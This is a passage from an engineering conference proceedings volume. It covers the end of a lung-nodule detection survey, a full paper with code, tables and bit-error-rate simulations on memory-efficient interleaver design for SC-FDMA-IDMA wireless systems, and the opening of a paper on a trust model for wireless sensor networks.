9 Al-Shabi et al. [55], 2019 GD-CNN 92.57% (ACC)

challenging task, and thus the accurate elimination of vessels and anatomical noise will ensure fewer false positives (FP). For future research, in order to address the database problem, unsupervised learning methodologies need to be explored further, along with multi-modality fusion techniques. Emphasis is also needed on noise elimination techniques for the reduction of false positives.

References

1. WHO Report on Cancer, Setting Priorities, Investing Wisely and Providing Care for All,World
Health Organization, Geneva, Switzerland. (2020).
2. Ozdemir, O., Russell, R. L., & Berlin, A. A. (2020). A 3D probabilistic deep learning system
for detection and diagnosis of lung cancer using low-dose CT scans. IEEE Transactions on
Medical Imaging, 39(5), 1419–1429. https://doi.org/10.1109/TMI.2019.2947595
3. Siegel, R. L., Miller, K. D., & Jemal, A. (2020). Cancer statistics, 2020. Cancer Journal for
Clinicians, 70(1), 7–30. https://doi.org/10.3322/caac.21590
4. De Koning, H. J. (2020). Reduced lung-cancer mortality with volume CT screening in a random-
ized trial. New England Journal of. Medicine, 382(6), 503–513. https://doi.org/10.1056/nejmoa
1911793
5. Snoeckx, A., Reyntiens, P., Desbuquoit, D., Spinhoven, M. J., Van Schil, P. E., Meerbeeck, J.
P., & Parizel, P. M. (2018). Evaluation of the solitary pulmonary nodule: Size matters, but do
not ignore the power of morphology. Insights into Imaging, 9(1), 73–86.
6. Zhou, Q. (2016). China national guideline of classification, diagnosis and treatment for lung
nodules. Zhongguo Zhi, 19(12), 793–798. https://doi.org/10.3779/j.issn.1009-3419.2016.12.12
7. Cressman, S. (2017). The cost-effectiveness of high-risk lung cancer screening and drivers of
program efficiency. Journal of Thoracic Oncology, 12(8), 1210–1222. https://doi.org/10.1016/
j.jtho.2017.04.021
8. Gu, J., Tian, Z., & Qi, Y. (2020). Pulmonary nodules detection based on deformable convolution.
IEEE Access, 8, 16302–16309. https://doi.org/10.1109/ACCESS.2020.2967238
9. Hussein, S., Kandel, P., Bolan, C. W., Wallace, M. B., & Bagci, U. (2019). Lung and pancreatic
tumour characterization in the deep learning era: Novel supervised and unsupervised learning
approaches. IEEE Transactions on Medical Imaging, 38(8), 1777–1787. https://doi.org/10.
1109/TMI.2019.2894349
10. Tong, C., et al. (2021). Pulmonary nodule classification based on heterogeneous features
learning. IEEE Journal on Selected Areas in Communications, 39(2), 574–581. https://doi.
org/10.1109/JSAC.2020.3020657
11. Ye, Y., Tian, M., Liu, Q., & Tai, H.-M. (2020). Pulmonary nodule detection using v-net and
high-level descriptor based SVM classifier. IEEE Access, 8, 176033–176041. https://doi.org/
10.1109/ACCESS.2020.3026168
12. Ali, I., Muzammil, M., Haq, I. U., Khaliq, A. A., & Abdullah, S. (2020). Efficient lung nodule
classification using transferable texture convolutional neural network. IEEE Access, 8, 175859–
175870. https://doi.org/10.1109/ACCESS.2020.3026080
13. Gong, L., Jiang, S., Yang, Z., et al. (2019). Automated pulmonary nodule detection in CT
images using 3D deep squeeze-and-excitation networks. International Journal of Computer
Assisted Radiology and Surgery, 14, 1969–1979. https://doi.org/10.1007/s11548-019-01979-1
14. Su, Y., Li, D., & Chen, X. (2020). Lung nodule detection based on faster R-CNN frame-
work. Computer Methods and Programs in Biomedicine. https://doi.org/10.1016/j.cmpb.2020.
105866
15. Cai, L., Long, T., Dai, Y., & Huang, Y. (2020). Mask R-CNN-based detection and segmentation
for pulmonary nodule 3D visualization diagnosis. IEEE Access, 8, 44400–44409. https://doi.
org/10.1109/ACCESS.2020.2976432
16. Harsono, I. W., Liawatimena, S., & Cenggoro, T. W. (2020). Lung nodule detection and clas-
sification from Thorax CT-scan using RetinaNet with transfer learning. Journal King Saud
University-Computer and Information Sciences. https://doi.org/10.1016/j.jksuci.2020.03.013.
ISSN 1319-1578.
17. Shi, Y., Li, H., Zhang, H., Wu, Z., & Ren, S. (2020). Accurate and efficient LIF-Nets for 3D
detection and recognition. IEEE Access, 8, 98562–98571. https://doi.org/10.1109/ACCESS.
2020.2995886
18. Masood, A., et al. (2020). Automated decision support system for lung cancer detection and
classification via enhanced RFCN with multilayer fusion RPN. IEEE Transactions on Industrial
Informatics, 16(12), 7791–7801. https://doi.org/10.1109/TII.2020.2972918

19. Kuo, C-F. J., Huang, C-C., Siao, J-J., Hsieh, C-W., Huy, V. Q., Ko, K-H., & Hsu, H-H. (2020).
Automatic lung nodule detection system using image processing techniques in computed
tomography. Biomedical Signal Processing and Control, 56, 101659. https://doi.org/10.1016/
j.bspc.2019.101659. ISSN 1746-8094.
20. Rey, A., Arcay, B., & Castro, A. (2020). A hybrid CAD system for lung nodule detection using
CT studies based in soft computing. Expert Systems with Applications, 114259. https://doi.org/
10.1016/j.eswa.2020.114259. ISSN 0957-4174.
21. Zheng, S., Cui, X., Vonder, Raymond, M., Veldhuis, N. J., Ye, Z., Vliegenthart, R., Oudkerk, M.,
& van Ooijen, P. M. A. (2020). Deep learning-based pulmonary nodule detection: Effect of slab
thickness in maximum intensity projections at the nodule candidate detection stage. Computer
Methods and Programs in Biomedical, 196, 105620. https://doi.org/10.1016/j.cmpb.2020.105
620. ISSN 0169-2607.
22. Suresh, S., & Mohan, S. (2019). NROI based feature learning for automated tumor stage
classification of pulmonary lung nodules using deep convolutional neural networks. Journal
of King Saud University-Computer and Information Sciences. https://doi.org/10.1016/j.jksuci.
2019.11.013. ISSN 1319-1578.
23. Al-Shabi, M., Lee, H. K., & Tan, M. (2019). Gated-dilated networks for lung nodule classifi-
cation in CT scans. IEEE Access, 7, 178827–178838. https://doi.org/10.1109/ACCESS.2019.
2958663
24. Veasey, B. P., Broadhead, J., Dahle, M., Seow, A., & Amini, A. A. (2020). Lung nodule malig-
nancy prediction from longitudinal CT scans with siamese convolutional attention networks.
IEEE Open Journal of Engineering in Medicine and Biology, 1, 257–264. https://doi.org/10.
1109/OJEMB.2020.3023614
25. Li, X., Li, B., Liu, F., Yin, H., & Zhou, F. (2020). Segmentation of pulmonary nodules using a
GMM fuzzy C-Means algorithm. IEEE Access, 8, 37541–37556. https://doi.org/10.1109/ACC
ESS.2020.2968936
26. Sun, Y., Tang, J., Lei, W., & He, D. (2020). 3D Segmentation of pulmonary nodules based on
multi-view and semi-supervised. IEEE Access, 8, 26457–26467. https://doi.org/10.1109/ACC
ESS.2020.2971542
27. Xie, Y., et al. (2019). Knowledge-based collaborative deep learning for benign-malignant lung
nodule classification on chest CT. IEEE Transactions on Medical Imaging, 38(4), 991–1004.
https://doi.org/10.1109/TMI.2018.2876510
28. Li, G., et al. (2020). Study on the detection of pulmonary nodules in CT images based on deep
learning. IEEE Access, 8, 67300–67309. https://doi.org/10.1109/ACCESS.2020.2984381
29. Zhang, Q., & Kong, X. (2020). Design of automatic lung nodule detection system based on
multi-scene deep learning framework. IEEE Access, 8, 90380–90389. https://doi.org/10.1109/
ACCESS.2020.2993872
30. Gu, X., Xie, W., Fang, Q., Zhao, J., & Li, Q. (2020). The effect of pulmonary vessel suppression
on computerized detection of nodules in chest CT scans. Medical Physics, 47, 4917–4927.
https://doi.org/10.1002/mp.14401
31. Shaukat, F., Raja, G., Ashraf, R., et al. (2019). Artificial neural network based classification
of lung nodules in CT images using intensity, shape and texture features. Journal of Ambient
Intelligence and Humanized Computing, 10, 4135–4149. https://doi.org/10.1007/s12652-019-
01173-w
32. Roy, R., Banerjee, P., & Chowdhury, A. S. (2020). A level set based unified framework for
pulmonary nodule segmentation. IEEE Signal Processing Letters, 27, 1465–1469. https://doi.
org/10.1109/LSP.2020.3016563
33. Samundeeswari, P., & Gunasundari, R. (2020). A novel multilevel hybrid segmentation and
refinement method for automatic heterogeneous true NSCLC nodules extraction. In 2020
5th International Conference on Devices, Circuits and Systems (ICDCS), Coimbatore, India
(pp. 226–235). https://doi.org/10.1109/ICDCS48716.2020.243586
34. Gong, J., Liu, J., Wang, L., Sun, X., Zheng, B., & Nie, S. (2018). Automatic detection
of pulmonary nodules in CT images by incorporating 3D tensor filtering with local image
feature analysis. Physica Medica, 46, 124–133. https://doi.org/10.1016/j.ejmp.2018.01.019.
ISSN 1120-1797.

35. Chung, H., Ko, H., Jeon, S. J., Yoon, K. H., & Lee, J. (2018). Automatic lung segmentation
with Juxta-Pleural nodule identification using active contour model and bayesian approach.
IEEE Journal of Translational Engineering in Health and Medicine, 6, 1–13, 1800513. https://
doi.org/10.1109/JTEHM.2018.2837901
36. Wang, B., et al. (2020). A fast and efficient CAD system for improving the performance of
malignancy level classification on lung nodules. IEEE Access, 8, 40151–40170. https://doi.org/
10.1109/ACCESS.2020.2976575
37. Gong, Z., Li, D., Lin, J., Zhang, Y., & Lam, K.-M. (2020). Towards accurate pulmonary nodule
detection by representing nodules as points with high-resolution network. IEEE Access, 8,
157391–157402. https://doi.org/10.1109/ACCESS.2020.3019104
38. Zheng, S., Guo, J., Cui, X., Veldhuis, R. N. J., Oudkerk, M., & van Ooijen, P. M. A. (2020).
Automatic pulmonary nodule detection in CT scans using convolutional neural networks based
on maximum intensity projection. IEEE Transactions on Medical Imaging, 39(3), 797–805.
https://doi.org/10.1109/TMI.2019.2935553
39. Monkam, P., et al. (2019). Ensemble learning of multiple-view 3D-CNNs model for micro-
nodules identification in CT images. IEEE Access, 7, 5564–5576. https://doi.org/10.1109/ACC
ESS.2018.2889350
40. Chenyang, L., & Chan, S.-C. (2020). A joint detection and recognition approach to lung cancer
diagnosis from CT images with label uncertainty. IEEE Access, 8, 228905–228921. https://doi.
org/10.1109/ACCESS.2020.3044941
41. Zhou, Z., Li, S., Qin, G., Folkert, M., Jiang, S., & Wang, J. (2020). Multi-Objective based
radiomic feature selection for lesion malignancy classification. IEEE Journal of Biomedical
and Health Informatics, 24(1), 194–204. https://doi.org/10.1109/JBHI.2019.2902298
42. Khan, S. A., Nazir, M., Khan, M. A., et al. (2019). Lungs nodule detection framework
from computed tomography images using support vector machine. Microscopy Research and
Technique, 82, 1256–1266. https://doi.org/10.1002/jemt.23275
43. Sahu, P., Yu, D., Dasari, M., Hou, F., & Qin, H. (2019). A lightweight multi-section CNN for
lung nodule classification and malignancy estimation. IEEE Journal of Biomedical and Health
Informatics, 23(3), 960–968. https://doi.org/10.1109/JBHI.2018.2879834
44. Wang, W., et al. (2019). Nodule-Plus R-CNN and deep self-paced active learning for 3D
instance segmentation of pulmonary nodules. IEEE Access, 7, 128796–128805. https://doi.
org/10.1109/ACCESS.2019.2939850
45. Saba, T., Sameh, A., Khan, F., et al. (2019). Lung nodule detection based on ensemble of hand
crafted and deep features. Journal of Medical Systems, 43, 332. https://doi.org/10.1007/s10
916-019-1455-6
46. Zhang, B., et al. (2019). Ensemble learners of multiple deep CNNs for pulmonary nodules
classification using CT images. IEEE Access, 7, 110358–110371. https://doi.org/10.1109/ACC
ESS.2019.2933670
47. Zhai, P., Tao, Y., Chen, H., Cai, T., & Li, J. (2020). Multi-Task learning for lung nodule
classification on chest CT. IEEE Access, 8, 180317–180327. https://doi.org/10.1109/ACCESS.
2020.3027812
48. Cao, H., et al. (2019). Multi-Branch ensemble learning architecture based on 3D CNN for false
positive reduction in lung nodule detection. IEEE Access, 7, 67380–67391. https://doi.org/10.
1109/ACCESS.2019.2906116
49. Armato, S. G. (2011). The lung image database consortium (LIDC) and image database re-
source initiative (IDRI): A completed reference database of lung nodules on CT scans. Medical
Physics, 38(2), 915–931. https://doi.org/10.1118/1.3528204
50. NLST Datasets. Accessed: Aug. 15, 2020. [Online]. Available: https://cdas.can-cer.gov/dat
asets/nlst/
51. VIA/I-ELCAP Datasets. Accessed: Aug. 15, 2020. [Online]. Available: http://www.via.cornell.
edu/databases/lungdb.html
52. Ru Zhao, Y., Xie, X., de Koning, H. J., Mali, W. P., Vliegenthart, R., & Oudkerk, M. (2011).
NELSON lung cancer screening study. Cancer Imaging, 11(1A), S79–S84. https://doi.org/10.
1102/1470-7330.2011.9020

53. Tan, M., Wu, F., Yang, B., Ma, J., Kong, D., Chen, Z., & Long, D. (2020). Pulmonary nodule
detection using hybrid two-stage 3D CNNs. Medical Physics, 47, 3376–3388. https://doi.org/
10.1002/mp.14161
54. Kuang, Y., Lan, T., Peng, X., Selasi, G. E., Liu, Q., & Zhang, J. (2020). Unsupervised multi-
discriminator generative adversarial network for lung nodule malignancy classification. IEEE
Access, 8, 77725–77734. https://doi.org/10.1109/ACCESS.2020.2987961
55. Masood, A., et al. (2020). Cloud-Based automated clinical decision support system for detection
and diagnosis of lung cancer in chest CT. IEEE Journal of Translational Engineering in Health
and Medicine, 8, 1–13, 4300113. https://doi.org/10.1109/JTEHM.2019.2955458
Efficient Interleaver Design for SC-FDMA-IDMA Systems

Roopali Agarwal and Manoj Kumar Shukla

Abstract In many research fields, the use of multiple interleavers has recently attracted growing interest. Interleavers that require less memory space for storing chip patterns are considered more efficient. We propose efficient non-orthogonal interleavers based on a quadratic permutation polynomial with maximum spread and cyclic shifting at certain steps. Our work targets good user separation in single-carrier frequency division multiple access and interleave division multiple access (SC-FDMA-IDMA) systems. This technique offers an alternative to generating random permutations, with lower memory demand and complexity in SC-FDMA-IDMA systems. The findings show that the interleavers created by the proposed methodology are sufficient to be used in the SC-FDMA-IDMA scheme without sacrificing its performance.

Keywords SC-FDMA · Interleaving and multiuser detection · Permutation ·


Interleave division multiple access · Interleaver · Bit error rate

1 Introduction

Interleave division multiple access is a method that uses multiple interleavers to distinguish the information of different devices in a multiuser communication scheme (Ping et al. [1]). A common way to obtain random interleavers of size N is to independently repeat the random interleaver-generation process K times; each random interleaver draws random numbers from the same distribution, and the resulting pattern is used as an interleaver [2]. Ping et al. presented random and independent interleavers in [3]. For a random interleaver, the interleaver matrix may have to be sent to the receiver, which can be very costly. To limit the storage overhead and the amount of information shared between transmitter and receiver, [4] presented power interleavers. Three forms of interleavers, e.g., orthogonal interleavers, pseudorandom interleavers, and integrated interleavers, were also defined by Pupeza et al. [5], who also proposed a way to constrain the intersection between interleavers.

R. Agarwal (B) · M. K. Shukla


Electronics Engineering Department, Harcourt Butler Technical University, Kanpur, India


For pseudorandom interleavers, it becomes hard to establish suitable polynomials as the number of users K grows, and applications have to accommodate either the generation time of power interleavers or integrated interleavers, where the focus shifts to the interaction between the multiple interleavers. We therefore want to provide a simple rule for the construction of interleavers that decreases the required memory. Our goal is to design a non-orthogonal interleaver that performs like a random interleaver and satisfies two construction requirements, definition and reproduction: only a few input parameters should need to be transmitted, from which the interleaving pattern can be regenerated at the receiver. In this paper, a maximum-spread quadratic permutation polynomial is used to generate the interleavers of SC-FDMA-IDMA systems.
SC-FDMA-IDMA is a hybrid multiple access framework that retains several desirable attributes of SC-FDMA and IDMA; its BER performance is very close to that of OFDM-IDMA. In this paper, the reason for selecting the SC-FDMA-IDMA method is that it offers very low impact, high access, moderate signal interference, and medium carrying, especially in comparison with IDMA and other equivalents such as OFDM-IDMA based on orthogonal FDMA (Yadav et al. [6]). The basic NOMA concept is to support many users over the same time, frequency, and space resources. Non-orthogonal multiple access (NOMA) has been established as one of the main features considered for the 5G New Radio (NR) mobile communication system. NOMA offers a number of desirable advantages, such as increased spectrum efficiency, reduced latency with high reliability, and massive connectivity. NOMA's primary use case is the uplink, where many user equipments (UEs) attempt to use the same resources in real time for the same predicted system benefit. The potential advantage of a NOMA system lies in better spectrum efficiency relative to conventional orthogonal multiple access (OMA), where each user enjoys a dedicated transmission resource and requires resource allocation, reference signaling, and secure transmission, as presented by Lai et al. [7]. Such a feature is critical for ultra-reliable low-latency communication (URLLC) systems. The spreading codes used may or may not follow a specified structure, and NOMA spreading schemes can be grouped into short and long spreading strategies. Multi-user shared access (MUSA) can be considered an example of a short-spreading NOMA scheme, where a predefined set of non-orthogonal sequences is used for user separation, as in [8]. A key feature of IDMA lies in how it handles multiuser interference, which is treated as additional noise; during detection, a priori LLRs are continuously refined by updating the relevant signal and interference statistics. Baseline evaluations of SC-FDMA-IDMA exist in the literature [8–10]. Section 2 describes the interleaver design, Sect. 3 explains the system model of the SC-FDMA-IDMA system, Sect. 4 presents the simulation results, and the last section concludes the paper.

2 Interleaver Design

The design principle of the efficient interleavers is to begin with the initialization of a master interleaver, from which the family of interleavers is created by reading the interleaver indices in a deterministic order [11]. The generation process can be described as follows:
(1) Construct a length-N one-dimensional interleaver and write the master interleaver indices row-wise into a matrix of IR rows and ICN columns, as in Table 1, where IR · ICN = N.
(2) The initial row of the matrix is generated by the permutation polynomial [12] given below:

    2^(2k−1) = ICN    (1)

The value of k obtained from Eq. 1 is used in Eq. 2 to find the initial interleaver:

    f(x) = ((2^k − 1)·x + 2^(k+1)·x^2) mod 2^(2k−1)    (2)

(3) To apply the permutation to the column indices, the initial interleaver pattern (3,1,4,0,2,5) obtained from (2) is divided by IR, and the remainder of each element gives the first row; the subsequent rows are generated by rotation, as shown in Table 2. The storage in the column indices after the permutation is shown in Table 3.
(4) For the row permutation, begin with the initial interleaver; the other rows of the matrix are generated by a simple one-step cyclic shift of the previous interleaving pattern, as in Table 4. Table 5 shows the final storage in the matrix after the row permutation.
(5) The first row of the interleaver for user k is formed by cyclically shifting the initial interleaver by S·k steps, where S = int(ICN/K) is the shift unit step and int(·) returns the largest whole number not greater than its argument. For example, with m = 8 data information bits and spreading factor sl = 3, the chip length is m·sl = N = IR·ICN = 24.
Let IR = 4, ICN = 6, IR·ICN = 24, and K = 3, so that S = 6/3 = 2 and S·k = 0, 2, 4 for k = 0, 1, 2. Table 1 shows the initialization of the matrix of length N = 24. The interleaving bit sequence for user 1 is
Π1 = 3,7,16,18,2,11,13,22,0,8,17,9,4,6,14,23,15,19,12,20,5,21,1,10.
First row for the row permutation for user 2 = 4,0,2,5,3,1
First row for the column permutation for user 2 = 0,0,2,1,3,1
Π2 = 22,0,14,11,9,1,6,20,17,15,7,4,2,23,21,13,10,12,5,3,19,16,18,8
First row for the row permutation for user 3 = 2,5,3,1,4,0
First row for the column permutation for user 3 = 2,1,3,1,0,0
Π3 = 20,5,9,7,4,12,11,15,13,10,18,2,21,19,16,0,8,17,1,22,6,14,23,3.
(A sketch of this construction in code is given after Table 5.)

Table 1 Initialization of the matrix


Example ICN = 0 ICN = 1 ICN = 2 ICN = 3 ICN = 4 ICN = 5
IR = 0 0 1 2 3 4 5
IR = 1 6 7 8 9 10 11
IR = 2 12 13 14 15 16 17
IR = 3 18 19 20 21 22 23

Table 2 Pattern of permutation for the column


Example ICN = 0 ICN = 1 ICN = 2 ICN = 3 ICN = 4 ICN = 5
IR = 0 3 1 0 0 2 1
IR = 1 0 2 1 1 3 2
IR = 2 1 3 2 2 0 3
IR = 3 2 0 3 3 1 0

Table 3 Storage following permutation of the column


Example ICN = 0 ICN = 1 ICN = 2 ICN = 3 ICN = 4 ICN = 5
IR = 0 18 7 2 3 16 11
IR = 1 0 13 8 9 22 17
IR = 2 6 19 14 15 4 23
IR = 3 12 1 20 21 10 5

Table 4 Pattern for row


Example ICN = 0 ICN = 1 ICN = 2 ICN = 3 ICN = 4 ICN = 5
IR = 0 3 1 4 0 2 5
IR = 1 1 4 0 2 5 3
IR = 2 4 0 2 5 3 1
IR = 3 0 2 5 3 1 4

Table 5 Storing after the permutation row


Example ICN = 0 ICN = 1 ICN = 2 ICN = 3 ICN = 4 ICN = 5
IR = 0 3 7 16 18 2 11
IR = 1 13 22 0 8 17 9
IR = 2 4 6 14 23 15 19
IR = 3 12 20 5 21 1 10
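A minimal Python/NumPy sketch of the construction in steps (1)–(5) is given below. The initial row is taken directly from the worked example (in the paper it comes from the QPP of Eq. 2), and the helper name is ours; with IR = 4, ICN = 6, and S = 2 it reproduces Tables 3–5 and the patterns Π1–Π3 listed above.

```python
import numpy as np

def build_interleaver(initial, i_r, i_c, shift=0):
    """Reproduce the interleaver construction of Tables 1-5.

    `initial` is the length-ICN starting permutation (from the quadratic
    permutation polynomial of Eq. 2); `shift` is the per-user cyclic shift S*k.
    """
    base = np.arange(i_r * i_c).reshape(i_r, i_c)     # Table 1: row-wise chip indices
    row_perm = np.roll(initial, -shift)               # first row for the row permutation
    col_row0 = row_perm % i_r                         # first row for the column permutation
    # remaining rows of the column pattern increment the previous row mod IR (Table 2)
    col_pattern = (col_row0[None, :] + np.arange(i_r)[:, None]) % i_r
    # column permutation: pick, per column, the row index given by the pattern (Table 3)
    after_cols = np.take_along_axis(base, col_pattern, axis=0)
    # row permutation: each row uses a one-step cyclic shift of the previous pattern (Tables 4, 5)
    out = np.empty_like(base)
    for r in range(i_r):
        out[r] = after_cols[r, np.roll(row_perm, -r)]
    return out.ravel()                                # read row-wise -> interleaving pattern

# Worked example from Section 2: IR = 4, ICN = 6, K = 3 users, S = ICN // K = 2
initial = np.array([3, 1, 4, 0, 2, 5])
for k in range(3):
    print(f"user {k + 1}:", build_interleaver(initial, 4, 6, shift=2 * k))
# e.g. user 1 -> 3 7 16 18 2 11 13 22 0 8 17 9 ... (matches the pattern for Π1 above)
```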

3 SC-FDMA-IDMA System Model

In this article, we consider K users in a spread-spectrum communication system. At the transmitter side, the data of all users (each user's data length is m) are spread by a spreading sequence of the same length sl, and different users are separated from each other by interleaving each user's data with a different chip sequence; spread data are denoted by "chips" instead of "bits", so the chip length equals m·sl. The data symbols are converted into the frequency domain by an M-point DFT. Following subcarrier mapping, the modulated data symbols are mapped onto subcarriers, and these modulated subcarriers are then transformed from frequency-domain samples to time-domain samples by the IFFT block [13]. All the signals are superimposed and transmitted by a single antenna. We consider an AWGN channel with zero mean and variance σ² at the receiver, as shown in the block diagram of Fig. 1. After the DFT, subcarrier de-mapping, and the IDFT block, a chip-by-chip detection algorithm is applied. This is done in two steps. In the first step, extrinsic log-likelihood ratios (LLRs) around {xk(j)} are generated by the elementary signal estimator (eESE) and the decoders (eDEC); these are the outputs of the ESE and DECs and are defined as [14]:
 
e(xk(j)) = log [ Pr(xk(j) = +1) / Pr(xk(j) = −1) ],   ∀ k, j

In the next step, these ratios are continuously updated through the feedback path across the iterations, and an estimate of the correctly received bits is obtained.
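The per-user transmit chain described above (spreading, chip interleaving, M-point DFT, localized subcarrier mapping, IFFT) can be sketched in Python as follows. Repetition spreading with BPSK is used as a stand-in for the length-sl spreading sequence, the FFT size and mapping offset are illustrative, and the iterative ESE/DEC receiver loop is omitted.

```python
import numpy as np

def sc_fdma_idma_tx(bits, spread_len, interleaver, n_fft, start_sc):
    """One user's SC-FDMA-IDMA transmit chain (BPSK, localized subcarrier mapping)."""
    chips = np.repeat(2 * bits - 1, spread_len)       # BPSK + repetition spreading, length m*sl
    chips = chips[interleaver]                        # user-specific chip interleaver
    m = chips.size
    freq = np.fft.fft(chips) / np.sqrt(m)             # M-point DFT
    mapped = np.zeros(n_fft, dtype=complex)           # localized mapping onto n_fft subcarriers
    mapped[start_sc:start_sc + m] = freq
    return np.fft.ifft(mapped) * np.sqrt(n_fft)       # time-domain samples to transmit

# Toy example: m = 8 data bits, sl = 3 -> 24 chips, as in the Section 2 example
rng = np.random.default_rng(0)
bits = rng.integers(0, 2, 8)
pi_1 = rng.permutation(24)                            # stand-in for the designed interleaver
tx = sc_fdma_idma_tx(bits, spread_len=3, interleaver=pi_1, n_fft=64, start_sc=0)
print(tx.shape)                                       # (64,)
```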

Fig. 1 Transmitter and receiver structure of the SC-FDMA-IDMA scheme, after Agarwal and Shukla [15] (block diagram: per-user spreading, interleaver Πk, DFT, subcarrier mapping, and IDFT at the transmitter over an AWGN channel; FFT, subcarrier de-mapping, IDFT, and the iterative ESE/DEC loop exchanging eESE(x(j)) and eDEC(x(j)) at the receiver)

4 Simulation Result

MATLAB simulation is used to conduct the performance study of uncoded SC-FDMA-IDMA. Among all the interleavers considered, the proposed efficient interleaver requires the minimum number of input parameters, which implies very easy software or hardware implementation as well as a limited memory requirement. The bit error rate of the SC-FDMA-IDMA framework simulated with the suggested interleaver, the random interleaver, the power interleaver, and the tree-based interleaver of Shukla et al. [16] is shown in Fig. 2. For all the simulations we considered the same parameters: number of users n = 16, blocks = 50, number of iterations = 5, data length = 512, and spreading length = 16. Figure 2 demonstrates that the bit error rate performance obtained by the proposed interleaver is better than that of the other interleavers and is almost identical to that of the random interleaver. Figure 3 shows the comparison of BER performance for a varying number of users with the proposed interleaver, under the same parameters as simulated for Fig. 2; as the number of users increases, more energy per bit is required to achieve a zero bit error rate, owing to the increased load on the system.

Fig. 2 Bit error rate performance with numerous interleavers of the SC-FDMA-IDMA scheme (n = 16, block = 50, iteration = 5); BER versus Eb/No (dB) for the tree-based, random, power, and proposed (MS) interleavers

Fig. 3 SC-FDMA-IDMA scheme performance for separate user numbers (n = 4, 8, 16); BER versus Eb/No for n = 16 (q = 2, it = 5, block = 50), n = 8 (it = 5), and n = 4 (it = 5, block = 50)

Fig. 4 Comparison of the SC-FDMA-IDMA BER performance with the OFDM-IDMA system under the same simulation parameters (q = 2, n = 16, it = 5, block = 50); BER versus Eb/No

Figure 4 illustrates the comparison between the SC-FDMA-IDMA scheme and the OFDM-IDMA scheme, both with the suggested interleaver. Initially the bit error rate is the same for both schemes, but beyond an Eb/No of 5 dB the BER of SC-FDMA-IDMA decreases faster: a bit error rate of 10^-2 is obtained at 5.8 dB for the SC-FDMA-IDMA scheme, whereas OFDM-IDMA requires 11 dB for the same bit error rate. From Fig. 4 we can say that, with the proposed interleaver, the SC-FDMA-IDMA scheme requires lower bit energies for transmission than the OFDM-IDMA scheme. All the simulations assume data bits = 512, sl = 16, chip length = 8192, and n (users) = 16; taking ICN = 512 gives IR = 16. With a random interleaver (14*8196*5 total bits required), a huge memory is needed at the base station; with the tree-based interleaver, two orthogonal interleavers are required to generate the other interleavers; with the proposed efficient interleaver, only (10 + 16*5) bits are required, since only the values of r and n need to be sent, from which all the other interleavers are generated.

5 Conclusions

A novel method is suggested in this paper to generate an efficient interleaver that has a smaller memory storage requirement and lower complexity. Simulation results show that the proposed interleaver integrated with the SC-FDMA-IDMA scheme makes this scheme highly recommended for uplink communication, particularly for 5G non-orthogonal multiple access.

References

1. Ping, L., Liu, L., Wu, K., & Leung, W. K. (2006). Interleave-division Multiple-access. IEEE
Transactions on Wireless Communication, 5(4), 938–947.
2. Kusume, K., & Bauch, G. (2008). Simple construction of multiple interleavers: Cyclically
shifting a single interleaver. IEEE Transactions on Communications, 56(9), 1394–1397.
3. Ping, L., Liu, L., Wu, K., & Leung, W. K. (2003). A simple approach to near-optimal
multiuser detection: interleave-division multiple-access. In IEEE Wireless Communications
and Networking Conference, WCNC 2003 (vol. 4, no. 1, pp. 391–396).
4. Wu, S., Chen, X., & Zhou, S. (2009). A parallel interleaver design for IDMA systems. In
2009 International Conference on Wireless Communications & Signal Processing, Nanjing
(pp. 1–5).
5. Pupeza, Kavcic, A., & Ping, L. (2006). Efficient generation of interleavers for IDMA. In IEEE
International Conference on Communications, ICC 2006 (vol. 4, pp. 1508–1513).
6. Yadav, M., Gautam, P. R., Shokeen, V., et al. (2017). Modern Fisher-Yates shuffling based
random interleaver design for SCFDMA-IDMA systems. Wireless Personal Communications,
97, 63–73.
7. Lai, K., Wen, L., & Lei, J., et al. (2019). Secure transmission with interleaver for uplink sparse
code multiple access system. IEEE Wireless Communications Letters, 8(2), 336–339.
8. Haghighat, A., Nazar, S. N., Herath, S., & Olesen, R. (2017). On the performance of
IDMA-Based Non-Orthogonal multiple access schemes. In IEEE 86th Vehicular Technology
Conference (VTC-Fall) (pp. 1–5), Toronto.
9. Hamdoun, H., Nazir, S., Alzubi, & Laskot, P. (2020). Performance benefits of network coding
for HEVC video communications in satellite networks, Iranian Journal of Electrical and
Electronic Engineering, 17(3), 1–11.

10. Xiong, X., & Luo, Z.: SC-FDMA-IDMA: A hybrid multiple access scheme for LTE Uplink. In
7th International Conference on Wireless Communications, Networking and Mobile Computing
(pp. 1–5), Wuhan.
11. Hao, D., & Hoeher, P. A. (2008). Helical interleaver set design for interleave-division
multiplexing and related techniques. IEEE Communications Letters, 12(11), 843–845.
12. Takeshita, O. Y. (2007). Permutation polynomial interleavers: an algebraic-geometric perspec-
tive. IEEE Transactions on Information Theory, 53(6), 2116–2132.
13. Yadav, M., Shokeen, V., & Singhal, P. K. (2019). Flip Left-to-Right approach based inverse
tree interleavers for unconventional integrated OFDM-IDMA and SCFDMA-IDMA systems.
Wireless Personal Communications, 105, 1009–1026.
14. Hao, W., Ping, L., & Perotti, A. (2006). User-specific chip-level interleaver design for IDMA
systems. IEEE Electronic Letters, 42(4), 233–234.
15. Agarwal, R., & Shukla, M. (2017). SC-FDM-IDMA scheme employing BCH Coding.
International Journal of Electrical and Computer Engineering (IJECE), 7(2), 992–998.
16. Shukla, M., Srivastava, V., & Tiwari, S. (2008). Analysis and design of Tree Based Interleaver
for multiuser receivers in IDMA scheme. In 16th IEEE International Conference on Networks,
pp. 1–4, New Delhi.
Enhanced Bio-inspired Trust
and Reputation Model for Wireless
Sensor Networks

Vivek Arya, Sita Rani, and Nilam Choudhary

Abstract Today, WSNs have spread widely in both industry and academia, and research efforts are focused on enhancing their applications. One of the first concerns to be solved in order to achieve that expected enrichment is to assure a minimum level of security in such a restrictive environment. This study concentrates on trust and reputation system management. The proposed approach, titled enhanced bio-inspired trust and reputation model (EBTRM), extends the bio-inspired trust and reputation model (BTRM). The aim of the proposed algorithm is to provide an adequate security solution for the collusion network scenario of BTRM, offering a high level of security together with an energy-preserving ability.

Keywords Wireless sensor networks · Security · Trust and reputation system · BTRM · Accuracy · Path length and energy consumption

1 Introduction

In the last few years, researchers and scientists have paid more attention to the area of WSNs [1]. WSNs are composed of a large number of sensor nodes. These sensor nodes are small in size and battery powered [2, 3]. In WSNs, sensor nodes sense, collect, process and transmit data to other nodes to complete a task in a distributed manner. In WSNs [4, 5], the result is based on the cooperation of the sensor nodes. WSNs are used in a wide variety of applications, for example, industrial process control, ecological and habitat monitoring, home automation, health care systems, weather forecasting, traffic control, etc. Generally, WSNs are deployed in an outdoor environment, where the

V. Arya (B)
